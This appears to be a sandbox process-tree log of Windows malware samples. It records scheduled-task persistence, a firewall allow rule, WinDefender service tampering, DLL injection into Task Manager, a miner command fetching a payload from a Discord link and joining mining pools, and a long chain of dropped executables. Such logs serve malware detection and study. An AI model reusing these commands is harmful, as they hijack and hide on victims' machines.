C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6240
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10576
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6200
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6692
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5336
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5908
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11168
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11360
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5952
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5556
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5616
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5624
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5528
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5136
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:10492
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2560
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3940
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:4996
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11440
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11436
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3696
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2500
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:1356
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:4568
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11184
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2300
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:4184
-
-
-
C:\ProgramData\winmgr107.exeC:\ProgramData\winmgr107.exe1⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5056
-
C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe"C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe"C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:4440
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3084
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵PID:3464
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵PID:3972
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
PID:816
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:4912
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
PID:3008 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵PID:448
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:6604
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵PID:5504
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵PID:6112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Loads dropped DLL
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
- Loads dropped DLL
PID:5596
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵PID:5660
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵PID:7536
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Loads dropped DLL
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:11128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Loads dropped DLL
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:7720
-
-
-
-
C:\Users\Admin\Desktop\virussign.com_0d1d052a017c095816dffa6e1789be93.exe"C:\Users\Admin\Desktop\virussign.com_0d1d052a017c095816dffa6e1789be93.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
PID:4568 -
C:\Windows\SysWOW64\Bobihl32.exeC:\Windows\system32\Bobihl32.exe2⤵
- Executes dropped EXE
PID:580 -
C:\Windows\SysWOW64\Bjgnfd32.exeC:\Windows\system32\Bjgnfd32.exe3⤵
- Executes dropped EXE
PID:4608 -
C:\Windows\SysWOW64\Bfnnkeio.exeC:\Windows\system32\Bfnnkeio.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1524 -
C:\Windows\SysWOW64\Cmjcmooi.exeC:\Windows\system32\Cmjcmooi.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4104 -
C:\Windows\SysWOW64\Ccdkji32.exeC:\Windows\system32\Ccdkji32.exe6⤵
- Executes dropped EXE
PID:2912 -
C:\Windows\SysWOW64\Cjqqlc32.exeC:\Windows\system32\Cjqqlc32.exe7⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4472 -
C:\Windows\SysWOW64\Cpnidj32.exeC:\Windows\system32\Cpnidj32.exe8⤵
- Executes dropped EXE
PID:2276 -
C:\Windows\SysWOW64\Cfgaadad.exeC:\Windows\system32\Cfgaadad.exe9⤵
- Executes dropped EXE
- Modifies registry class
PID:1040 -
C:\Windows\SysWOW64\Dmkldm32.exeC:\Windows\system32\Dmkldm32.exe10⤵
- Executes dropped EXE
- Modifies registry class
PID:3540 -
C:\Windows\SysWOW64\Dhpqafpl.exeC:\Windows\system32\Dhpqafpl.exe11⤵
- Executes dropped EXE
PID:2184 -
C:\Windows\SysWOW64\Diamin32.exeC:\Windows\system32\Diamin32.exe12⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
PID:5092 -
C:\Windows\SysWOW64\Ejfcnp32.exeC:\Windows\system32\Ejfcnp32.exe13⤵
- Executes dropped EXE
PID:2644 -
C:\Windows\SysWOW64\Eapkkjqd.exeC:\Windows\system32\Eapkkjqd.exe14⤵
- Executes dropped EXE
PID:1608 -
C:\Windows\SysWOW64\Ednggfph.exeC:\Windows\system32\Ednggfph.exe15⤵
- Executes dropped EXE
PID:2300 -
C:\Windows\SysWOW64\Eabhpj32.exeC:\Windows\system32\Eabhpj32.exe16⤵
- Executes dropped EXE
PID:3416 -
C:\Windows\SysWOW64\Eimldl32.exeC:\Windows\system32\Eimldl32.exe17⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2844 -
C:\Windows\SysWOW64\Ehnmbddl.exeC:\Windows\system32\Ehnmbddl.exe18⤵
- Executes dropped EXE
PID:892 -
C:\Windows\SysWOW64\Ejmioo32.exeC:\Windows\system32\Ejmioo32.exe19⤵
- Executes dropped EXE
PID:412 -
C:\Windows\SysWOW64\Epjagf32.exeC:\Windows\system32\Epjagf32.exe20⤵
- Executes dropped EXE
PID:1520 -
C:\Windows\SysWOW64\Ffcjcpid.exeC:\Windows\system32\Ffcjcpid.exe21⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Modifies registry class
PID:4476 -
C:\Windows\SysWOW64\Fibfplhg.exeC:\Windows\system32\Fibfplhg.exe22⤵
- Executes dropped EXE
PID:4672 -
C:\Windows\SysWOW64\Fainaihj.exeC:\Windows\system32\Fainaihj.exe23⤵
- Executes dropped EXE
PID:2040 -
C:\Windows\SysWOW64\Fkabjo32.exeC:\Windows\system32\Fkabjo32.exe24⤵
- Executes dropped EXE
PID:1720 -
C:\Windows\SysWOW64\Fpnkbema.exeC:\Windows\system32\Fpnkbema.exe25⤵
- Executes dropped EXE
PID:5016 -
C:\Windows\SysWOW64\Fpqggeko.exeC:\Windows\system32\Fpqggeko.exe26⤵
- Executes dropped EXE
PID:4428 -
C:\Windows\SysWOW64\Fpcdme32.exeC:\Windows\system32\Fpcdme32.exe27⤵
- Executes dropped EXE
PID:736 -
C:\Windows\SysWOW64\Fhjlnb32.exeC:\Windows\system32\Fhjlnb32.exe28⤵
- Executes dropped EXE
PID:4440 -
C:\Windows\SysWOW64\Fkhhjn32.exeC:\Windows\system32\Fkhhjn32.exe29⤵
- Executes dropped EXE
PID:4164 -
C:\Windows\SysWOW64\Fabqghpo.exeC:\Windows\system32\Fabqghpo.exe30⤵
- Executes dropped EXE
PID:1416 -
C:\Windows\SysWOW64\Ghmidb32.exeC:\Windows\system32\Ghmidb32.exe31⤵
- Executes dropped EXE
PID:4304 -
C:\Windows\SysWOW64\Ginekjnj.exeC:\Windows\system32\Ginekjnj.exe32⤵
- Executes dropped EXE
PID:4780 -
C:\Windows\SysWOW64\Gaemmgnl.exeC:\Windows\system32\Gaemmgnl.exe33⤵
- Executes dropped EXE
- Modifies registry class
PID:4644 -
C:\Windows\SysWOW64\Ghoeiaei.exeC:\Windows\system32\Ghoeiaei.exe34⤵
- Executes dropped EXE
PID:2556 -
C:\Windows\SysWOW64\Gipbaj32.exeC:\Windows\system32\Gipbaj32.exe35⤵
- Executes dropped EXE
PID:380 -
C:\Windows\SysWOW64\Gpjjndcd.exeC:\Windows\system32\Gpjjndcd.exe36⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
PID:1780 -
C:\Windows\SysWOW64\Gnnkghbn.exeC:\Windows\system32\Gnnkghbn.exe37⤵
- Executes dropped EXE
PID:532 -
C:\Windows\SysWOW64\Gplgccaa.exeC:\Windows\system32\Gplgccaa.exe38⤵
- Executes dropped EXE
PID:1464 -
C:\Windows\SysWOW64\Ghcoda32.exeC:\Windows\system32\Ghcoda32.exe39⤵
- Executes dropped EXE
PID:2056 -
C:\Windows\SysWOW64\Galcmfhd.exeC:\Windows\system32\Galcmfhd.exe40⤵
- Executes dropped EXE
PID:1800 -
C:\Windows\SysWOW64\Ghfljq32.exeC:\Windows\system32\Ghfljq32.exe41⤵
- Executes dropped EXE
PID:748 -
C:\Windows\SysWOW64\Gkdhfl32.exeC:\Windows\system32\Gkdhfl32.exe42⤵
- Executes dropped EXE
PID:1308 -
C:\Windows\SysWOW64\Gnbdbg32.exeC:\Windows\system32\Gnbdbg32.exe43⤵
- Executes dropped EXE
PID:1612 -
C:\Windows\SysWOW64\Hdmloaee.exeC:\Windows\system32\Hdmloaee.exe44⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
PID:3948 -
C:\Windows\SysWOW64\Haqmhf32.exeC:\Windows\system32\Haqmhf32.exe45⤵
- Executes dropped EXE
PID:2244 -
C:\Windows\SysWOW64\Hjlamh32.exeC:\Windows\system32\Hjlamh32.exe46⤵
- Executes dropped EXE
PID:116 -
C:\Windows\SysWOW64\Hpfjibig.exeC:\Windows\system32\Hpfjibig.exe47⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3696 -
C:\Windows\SysWOW64\Hkkngk32.exeC:\Windows\system32\Hkkngk32.exe48⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3316 -
C:\Windows\SysWOW64\Hdcbpqom.exeC:\Windows\system32\Hdcbpqom.exe49⤵
- Executes dropped EXE
- Modifies registry class
PID:2860 -
C:\Windows\SysWOW64\Hknklk32.exeC:\Windows\system32\Hknklk32.exe50⤵
- Executes dropped EXE
PID:3476 -
C:\Windows\SysWOW64\Hahcieng.exeC:\Windows\system32\Hahcieng.exe51⤵
- Executes dropped EXE
- Modifies registry class
PID:2820 -
C:\Windows\SysWOW64\Hdfoepmk.exeC:\Windows\system32\Hdfoepmk.exe52⤵
- Executes dropped EXE
PID:1888 -
C:\Windows\SysWOW64\Hkpgbjdh.exeC:\Windows\system32\Hkpgbjdh.exe53⤵
- Executes dropped EXE
PID:3216 -
C:\Windows\SysWOW64\Iajpod32.exeC:\Windows\system32\Iajpod32.exe54⤵
- Executes dropped EXE
PID:1528 -
C:\Windows\SysWOW64\Ihdhkoca.exeC:\Windows\system32\Ihdhkoca.exe55⤵
- Executes dropped EXE
PID:3392 -
C:\Windows\SysWOW64\Inqqceai.exeC:\Windows\system32\Inqqceai.exe56⤵
- Executes dropped EXE
PID:4444 -
C:\Windows\SysWOW64\Igielk32.exeC:\Windows\system32\Igielk32.exe57⤵PID:3708
-
C:\Windows\SysWOW64\Incmie32.exeC:\Windows\system32\Incmie32.exe58⤵PID:4788
-
C:\Windows\SysWOW64\Idmefogc.exeC:\Windows\system32\Idmefogc.exe59⤵PID:3508
-
C:\Windows\SysWOW64\Ijjnnfej.exeC:\Windows\system32\Ijjnnfej.exe60⤵PID:4344
-
C:\Windows\SysWOW64\Idobkoep.exeC:\Windows\system32\Idobkoep.exe61⤵PID:3684
-
C:\Windows\SysWOW64\Ignngjdd.exeC:\Windows\system32\Ignngjdd.exe62⤵
- Modifies registry class
PID:388 -
C:\Windows\SysWOW64\Iqfcppkd.exeC:\Windows\system32\Iqfcppkd.exe63⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
- Modifies registry class
PID:5096 -
C:\Windows\SysWOW64\Ihmkamkf.exeC:\Windows\system32\Ihmkamkf.exe64⤵PID:2008
-
C:\Windows\SysWOW64\Jnjcjdin.exeC:\Windows\system32\Jnjcjdin.exe65⤵
- Modifies registry class
PID:400 -
C:\Windows\SysWOW64\Jhpggmid.exeC:\Windows\system32\Jhpggmid.exe66⤵PID:1656
-
C:\Windows\SysWOW64\Jkndchhh.exeC:\Windows\system32\Jkndchhh.exe67⤵PID:3468
-
C:\Windows\SysWOW64\Jbhlpb32.exeC:\Windows\system32\Jbhlpb32.exe68⤵PID:2940
-
C:\Windows\SysWOW64\Jhbdmm32.exeC:\Windows\system32\Jhbdmm32.exe69⤵
- Modifies registry class
PID:4980 -
C:\Windows\SysWOW64\Jhdabl32.exeC:\Windows\system32\Jhdabl32.exe70⤵PID:4564
-
C:\Windows\SysWOW64\Jkbmng32.exeC:\Windows\system32\Jkbmng32.exe71⤵
- Drops file in System32 directory
- Modifies registry class
PID:2224 -
C:\Windows\SysWOW64\Jdkagm32.exeC:\Windows\system32\Jdkagm32.exe72⤵
- Drops file in System32 directory
PID:3988 -
C:\Windows\SysWOW64\Jginci32.exeC:\Windows\system32\Jginci32.exe73⤵PID:1512
-
C:\Windows\SysWOW64\Jncfpbac.exeC:\Windows\system32\Jncfpbac.exe74⤵PID:4180
-
C:\Windows\SysWOW64\Jqbblnqg.exeC:\Windows\system32\Jqbblnqg.exe75⤵PID:1148
-
C:\Windows\SysWOW64\Jiijmkai.exeC:\Windows\system32\Jiijmkai.exe76⤵
- Adds autorun key to be loaded by Explorer.exe on startup
PID:2092 -
C:\Windows\SysWOW64\Jjjgec32.exeC:\Windows\system32\Jjjgec32.exe77⤵PID:4636
-
C:\Windows\SysWOW64\Kbaofa32.exeC:\Windows\system32\Kbaofa32.exe78⤵PID:2932
-
C:\Windows\SysWOW64\Kikgck32.exeC:\Windows\system32\Kikgck32.exe79⤵PID:4284
-
C:\Windows\SysWOW64\Kkjcof32.exeC:\Windows\system32\Kkjcof32.exe80⤵PID:3792
-
C:\Windows\SysWOW64\Kqflgn32.exeC:\Windows\system32\Kqflgn32.exe81⤵
- Modifies registry class
PID:3068 -
C:\Windows\SysWOW64\Kindhk32.exeC:\Windows\system32\Kindhk32.exe82⤵PID:3268
-
C:\Windows\SysWOW64\Kjoppccb.exeC:\Windows\system32\Kjoppccb.exe83⤵PID:1008
-
C:\Windows\SysWOW64\Kipqnj32.exeC:\Windows\system32\Kipqnj32.exe84⤵PID:4960
-
C:\Windows\SysWOW64\Kknmjfje.exeC:\Windows\system32\Kknmjfje.exe85⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
PID:2764 -
C:\Windows\SysWOW64\Kegack32.exeC:\Windows\system32\Kegack32.exe86⤵PID:1204
-
C:\Windows\SysWOW64\Kjcjkb32.exeC:\Windows\system32\Kjcjkb32.exe87⤵PID:1620
-
C:\Windows\SysWOW64\Ljffqbmj.exeC:\Windows\system32\Ljffqbmj.exe88⤵
- Adds autorun key to be loaded by Explorer.exe on startup
PID:4924 -
C:\Windows\SysWOW64\Lekknkmp.exeC:\Windows\system32\Lekknkmp.exe89⤵PID:4212
-
C:\Windows\SysWOW64\Ljhcfakg.exeC:\Windows\system32\Ljhcfakg.exe90⤵PID:5136
-
C:\Windows\SysWOW64\Lbpkgokj.exeC:\Windows\system32\Lbpkgokj.exe91⤵PID:5176
-
C:\Windows\SysWOW64\Liicdi32.exeC:\Windows\system32\Liicdi32.exe92⤵PID:5224
-
C:\Windows\SysWOW64\Lnfllpan.exeC:\Windows\system32\Lnfllpan.exe93⤵PID:5264
-
C:\Windows\SysWOW64\Lgopee32.exeC:\Windows\system32\Lgopee32.exe94⤵
- Drops file in System32 directory
- Modifies registry class
PID:5312 -
C:\Windows\SysWOW64\Ljmmaa32.exeC:\Windows\system32\Ljmmaa32.exe95⤵PID:5348
-
C:\Windows\SysWOW64\Lbddbn32.exeC:\Windows\system32\Lbddbn32.exe96⤵PID:5388
-
C:\Windows\SysWOW64\Linmohoa.exeC:\Windows\system32\Linmohoa.exe97⤵PID:5436
-
C:\Windows\SysWOW64\Lllikdne.exeC:\Windows\system32\Lllikdne.exe98⤵PID:5480
-
C:\Windows\SysWOW64\Lnkegomi.exeC:\Windows\system32\Lnkegomi.exe99⤵PID:5528
-
C:\Windows\SysWOW64\Laiack32.exeC:\Windows\system32\Laiack32.exe100⤵PID:5568
-
C:\Windows\SysWOW64\Liqieh32.exeC:\Windows\system32\Liqieh32.exe101⤵
- Adds autorun key to be loaded by Explorer.exe on startup
PID:5612 -
C:\Windows\SysWOW64\Mjaflpbm.exeC:\Windows\system32\Mjaflpbm.exe102⤵PID:5656
-
C:\Windows\SysWOW64\Malnij32.exeC:\Windows\system32\Malnij32.exe103⤵PID:5700
-
C:\Windows\SysWOW64\Mheffdaf.exeC:\Windows\system32\Mheffdaf.exe104⤵
- Adds autorun key to be loaded by Explorer.exe on startup
PID:5740 -
C:\Windows\SysWOW64\Mnpobo32.exeC:\Windows\system32\Mnpobo32.exe105⤵PID:5784
-
C:\Windows\SysWOW64\Mankojhg.exeC:\Windows\system32\Mankojhg.exe106⤵PID:5828
-
C:\Windows\SysWOW64\Miecpgii.exeC:\Windows\system32\Miecpgii.exe107⤵
- Modifies registry class
PID:5868 -
C:\Windows\SysWOW64\Mjfogp32.exeC:\Windows\system32\Mjfogp32.exe108⤵
- Drops file in System32 directory
PID:5916 -
C:\Windows\SysWOW64\Mbngim32.exeC:\Windows\system32\Mbngim32.exe109⤵PID:5952
-
C:\Windows\SysWOW64\Migpeggf.exeC:\Windows\system32\Migpeggf.exe110⤵PID:6000
-
C:\Windows\SysWOW64\Mlflabfj.exeC:\Windows\system32\Mlflabfj.exe111⤵
- Drops file in System32 directory
PID:6044 -
C:\Windows\SysWOW64\Mbpdnm32.exeC:\Windows\system32\Mbpdnm32.exe112⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
PID:6084 -
C:\Windows\SysWOW64\Menpjhlk.exeC:\Windows\system32\Menpjhlk.exe113⤵
- Modifies registry class
PID:6128 -
C:\Windows\SysWOW64\Mlhhgb32.exeC:\Windows\system32\Mlhhgb32.exe114⤵PID:5128
-
C:\Windows\SysWOW64\Mbbadlkd.exeC:\Windows\system32\Mbbadlkd.exe115⤵PID:5160
-
C:\Windows\SysWOW64\Miliqf32.exeC:\Windows\system32\Miliqf32.exe116⤵
- Drops file in System32 directory
PID:5220 -
C:\Windows\SysWOW64\Nlkemb32.exeC:\Windows\system32\Nlkemb32.exe117⤵PID:5288
-
C:\Windows\SysWOW64\Nagnei32.exeC:\Windows\system32\Nagnei32.exe118⤵PID:5344
-
